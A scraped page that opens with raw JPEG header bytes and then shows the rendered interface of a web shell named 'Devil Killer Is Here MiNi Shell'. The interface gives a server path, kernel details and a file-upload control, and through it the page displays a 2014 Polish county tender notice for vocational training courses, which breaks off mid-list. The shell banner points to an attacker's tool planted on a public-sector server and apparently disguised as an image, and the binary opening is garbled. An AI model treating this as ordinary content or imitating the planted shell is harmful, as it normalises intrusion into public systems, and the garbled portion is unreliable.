JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/55009-N-2014.html

<p class="kh_header"><b>Przeworsk: Organizacja i przeprowadzenie szkoleń kursów  
w ramach realizacji projektu pn. 
,,Podkarpacie stawia na zawodowców 
współfinansowanego z  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.2 Podniesienie atrakcyjności i jakości szkolnictwa</b><br>
<b>Numer ogłoszenia: 55009 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487009, faks 016 6487009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.przeworsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń kursów  
w ramach realizacji projektu pn. 
,,Podkarpacie stawia na zawodowców 
współfinansowanego z  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.2 Podniesienie atrakcyjności i jakości szkolnictwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń kursu dla uczniów szkół ponadgimnazjalnych dla których organem prowadzącym jest Powiat Przeworski w ramach realizacji projektu pn. ,,Podkarpacie stawia na zawodowców, ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego w podziale na następujące części: 
CZĘŚĆ I  -  Kurs spawania metodą MAG 
CZĘŚĆ II -  Kurs spawania metodą TIG
CZĘŚĆ III - Szkolenie z technologii CISCO 
CZĘŚĆ IV -  Kurs obsługi kas fiskalnych 
CZĘŚĆ V -     Kurs baristyczny  
CZĘŚĆ VI -   Kurs organizator przyjęć okolicznościowych - catering  
CZĘŚĆ VII - Kurs kelnerski 
2. Kursy są kierowane do uczniów techników klas od I do IV oraz zasadniczych szkół zawodowych klas od I do III z następujących szkół: 
- Zespół Szkół Zawodowych w Przeworsku ul. Krasickiego 9, 37-200 Przeworsk - Część I, II, III,   zamówienia, 
- Zespół Szkół Rolniczych w Zarzeczu ul. Im. Wincentego Witosa, 37-205 Zarzecze 1 - Część IV, V, VI, VII  zamówienia,
- Zespół Szkół w Kańczudze ul. Marii Konopnickiej 6, 37-220 Kańczuga - Część I, IV, V, VII zamówienia   3. Szczegółowy opis przedmiotu zamówienia oraz zakres tematyczny i warunki przeprowadzenia szkoleń/kursów na poszczególne Części zamówienia szczegółowo określone zostały w załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wnoszenie wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia wg wzoru na załączniku nr  3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez wykazanie przez Wykonawcę dla każdej części zamówienia, której dotyczy oferta, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował: 
 - dla Części I - co najmniej 2 kursy szkolenia w zakresie objętym przedmiotem zamówienia, tj. ze spawania metodą MAG przeznaczone dla min. 10 osób każde, 
 - dla Części II - co najmniej 2 kursy szkolenia w zakresie objętym przedmiotem zamówienia, tj. ze spawania metodą TIG przeznaczone dla min. 10 osób każde,
- dla Części III - co najmniej 2 szkolenia w zakresie objętym przedmiotem zamówienia, tj. z technologii CISCO przeznaczone dla min. 10 osób, 
 - dla Części IV - co najmniej 2 kursy w zakresie objętym przedmiotem zamówienia, tj. z zakresu obsługi kas fiskalnych  przeznaczone dla min. 10 osób każde,
- dla Części V - co najmniej cztery kursy szkolenia w zakresie objętym przedmiotem zamówienia, tj. z zakresu organizacji kursu o tematyce baristyki przeznaczone dla min. 10 osób,      
- dla Części VI - co najmniej 2 kursy  w zakresie objętym przedmiotem zamówienia, tj. z organizacji przyjęć okolicznościowych - catering  przeznaczone dla min. 10 osób,
     - dla Części VII - co najmniej 2 kursy w zakresie objętym przedmiotem zamówienia, tj. kurs kelnerski przeznaczony dla min. 10 osób,
Wykonawca zobowiązany jest do załączenia dowodów potwierdzających, że wykazane usługi, o których mowa powyżej, zostały wykonane należycie.
Jedna usługa oznacza usługę wykonywaną w ramach jednej umowy. Zamawiający zastrzega, że są to główne usługi, jakie powinien wykazać Wykonawca. 
	W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w Rozdziale VIII Części A  pkt. 1, 2   SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla Części V Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, iż posiada odpowiednie wyposażenie techniczne tj. dysponuje minimum trzema profesjonalnymi ekspresami ciśnieniowymi dwugrupowymi</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku nastąpi poprzez wykazanie przez wykonawcę, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, o kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Spełnienie tego warunku nastąpi poprzez złożenie informacji o podstawie do dysponowania tymi osobami, a także złożenie oświadczenia, że osoby wskazane do wykonywania zamówienia posiadają odpowiednie uprawnienia, tj.: 
- dla Części  - I, II, III, IV 
minimum 1 osobę posiadającą odpowiednie kwalifikacje do przeprowadzenia zajęć, posiadającą  doświadczenie w przeprowadzeniu min. dwóch szkoleń lub kursów, zgodnych z przedmiotem zamówienia z uwzględnieniem części zamówienia o które ubiega się składający ofertę. 
- dla Części  V, VI, VII - 
minimum 1 osobę posiadającą odpowiednie kwalifikacje do przeprowadzenia zajęć, posiadającą 3-letnie doświadczenie w przeprowadzeniu szkoleń lub kursów, w zakresie szkoleń o tematyce zgodnej z przedmiotem zamówienia z uwzględnieniem części zamówienia o które ubiega się składający ofertę. 
 W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale VIII Część A  pkt. 1 , 3 i 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia wg wzoru na załączniku nr  3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy zał. nr 2 do SIWZ. 
b)	dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy - w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza.
c)	pełnomocnictwo ustanawiającego Pełnomocnika - gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego - w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza.
d)	zobowiązanie podmiotu trzeciego (lub inny dokument potwierdzający udostępnienie zasobów) do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy 
wykonaniu zamówienia (oryginał) - jeżeli wykonawca dla wykazania spełniania warunków udziału w postępowaniu powołuje się  na zasoby innych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Stosownie do art. 144 ustawy Prawo zamówień publicznych strony mogą dokonywać nieistotnych zmian postanowień umowy, a także zastrzegają sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na:
1) zmianie terminu realizacji zamówienia
a)	z przyczyn niezależnych od Zamawiającego,
b)	w związku ze zmianą harmonogramu realizacji projektu i wynikającymi z tego wszelkimi konsekwencjami,
c)	z powodu zdarzeń losowych niezależnych od uczestników kursu/szkolenia,
2) zmianie w terminach płatności w przypadku zmiany terminów wypłaty transz w harmonogramie płatności dokonanych przez Instytucję Pośredniczącą,
3) zmianę osób prowadzących kurs/szkolenie - za uprzednią pisemną zgodą Zamawiającego, pod warunkiem, że nowo wskazane osoby będą posiadały kwalifikacje do prowadzenia kursu/szkolenia, jeżeli wynika to z przyczyn niezależnych od Wykonawcy (np. zdarzenia losowe: choroba, wypadek itp.)
4) zmianie wynagrodzenia - w przypadku;
a)	zmniejszenia ilości usług przez Zamawiającego bez zapłaty dodatkowych kwot 
b)	zmniejszenia liczby osób uczestniczących w kursie/szkoleniu z przyczyn niezależnych od Zamawiającego, będących wynikiem nie podjęcia kursu lub rezygnacji pomimo wcześniejszych deklaracji o uczestnictwie,
c)	zmiany stawki urzędowej podatku VAT,
d)	rezygnacji z części zamówienia, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych usług.
5) zmianie powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
6) zmiany liczby osób uczestniczących w kursie/szkoleniu z przyczyn niezależnych od Zamawiającego, będących wynikiem nie podjęcia kursu/szkolenia lub rezygnacji pomimo wcześniejszych deklaracji o uczestnictwie,
7) konieczności modyfikacji umowy w związku ze zmianą wytycznych dotyczących realizacji projektu, w ramach którego finansowana jest umowa 
8) Warunki dokonywania zmian postanowień umowy:
a) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
b) forma pisemna pod rygorem nieważności w formie aneksu do umów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatprzeworsk.pl  www.psnz.powiatprzeworsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Przeworsku ul. Jagiellońska 10, 37-200 Przeworsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 11:00, miejsce: Starostwo Powiatowe w Przeworsku ul. Jagiellońska 10, 37-200 Przeworsk, Kancelaria Ogólna pok. 419.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowany w ramach programu pn.: Podkarpacie stawia na zawodowców, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej Priorytet IX Rozwój wykształcenia i kompetencji w ramach Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs spawania metodą MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - dla Zespołu Szkół Zawodowych w Przeworsku
Zadanie 2 - dla Zespołu Szkół w Kańczudze
1. Miejsce przeprowadzenia kursu: 
Zadanie 1 - Zajęcia teoretyczne i praktyczne: Przeworsk lub miejscowość do 40 km od Przeworska .
Zadanie 2 - Zajęcia teoretyczne i praktyczne: Kańczuga lub miejscowość do 40 km od Kańczugi 
2. Liczba osób biorących udział w kursie:  
Zadanie 1 - 20 osób - (2 grupy po 10 osób)
Zadanie 2 - 20 osób - (2 grupy po 10 osób)
3. Liczba godzin:  145 godzin  (ok.25 % zajęć teoretycznych i ok.75 % praktycznych) 
4. Termin przeprowadzenia kursu: szkolenie należy przeprowadzić w okresach: 
Zadanie 1 - kwiecień-sierpień  2014r. - 20 osób (2 grupy po 10 osób)
Zadanie 2  - kwiecień - czerwiec 2014r.- 20 osób ( 2 grupy po 10 osób)
5. Celem szkolenia jest zaznajomienie jego uczestników z zagadnieniami z zakresu spawania metodą MAG, na poziomie pozwalającym na uzyskanie uprawnień spełniających warunki Polskiej Normy przenoszącej normy europejskie PN-EN 287-1. Szkolenie powinno odbywać się zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach lub innej uprawnionej jednostki. 
6. Zakres tematyczny obejmujący co najmniej: 
1.	Zastosowanie elektryczności do spawania łukowego
2.	Urządzenia spawalnicze
3.	Bezpieczeństwo i higiena pracy
4.	Bezpieczna praca na hali produkcyjnej
5.	Materiały dodatkowe do spawania
6.	Spawanie w praktyce
7.	Oznaczanie i wymiarowanie spoin
8.	Metody przygotowania złączy do spawania
9.	Kwalifikowanie spawaczy
10.	Budowa i użytkowanie urządzeń do spawania MAG
11.	Materiały dodatkowe do spawania
12.	Charakterystyka spawania MAG oraz typowe parametry
13.	Podstawowe wiadomości o stalach nierdzewnych, metody spawania, ochrona zdrowia
14.	Spawalność, złącza spawane i odkształcenia złączy ze stali nierdzewnych
15.	Materiały dodatkowe do spawania stali nierdzewnych
16.	Korozja i obróbka cieplna po spawaniu
17.	Instruktaż wstępny i ćwiczenia
7. Wykonawca zapewni:
- materiały do ćwiczeń praktycznych takie jak: blachy stalowe, drut spawalniczy, gaz techniczny.
- odzież ochronną (fartuchy spawalnicze, okulary, czapki, rękawice)
- badania lekarskie 
- materiały biurowe (skrypty)
- ubezpieczenie od następstw nieszczęśliwych wypadków uczestników kursu 
- egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs spawania metodą TIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zespół Szkół Zawodowych w Przeworsku
1. Miejsce przeprowadzenia kursu: 
Zajęcia teoretyczne i praktyczne: Przeworsk lub miejscowość do 40 km od Przeworska .
2. Liczba osób biorących udział w kursie:  
10 osób - 1 grupa 
3. Liczba godzin:  103 godzin  (ok.22% zajęć teoretycznych i ok.78 % praktycznych) 
4. Termin przeprowadzenia kursu: szkolenie należy przeprowadzić w okresach: 
kwiecień-sierpień  2014r. - 20 osób (2 grupy po 10 osób)
5. Cel kursu 
Szkolenie teoretyczne i praktyczne ma na celu zdobycie przez uczestników kursu umiejętności spawania metodą TIG-141 (spawania łukowego elektrodą wolframową) w zakresie wykonywania spoin pachwinowych w złączach blach i rur oraz uzyskanie kwalifikacji/uprawnień w odpowiednim zakresie wg wymagań normy PN-EN 287-1.  Szkolenie powinno odbywać się zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach lub innej uprawnionej jednostki. 
6. Zakres tematyczny obejmujący co najmniej: 
1.	Procesy spajania i pokrewne spawaniu
2.	Rysunek techniczny w spawalnictwie
3.	Materiały podstawowe
4.	Materiały dodatkowe
5.	Podstawy elektrotechniki
6.	Urządzenia i sprzęt do spawania
7.	Technika i technologia spawania
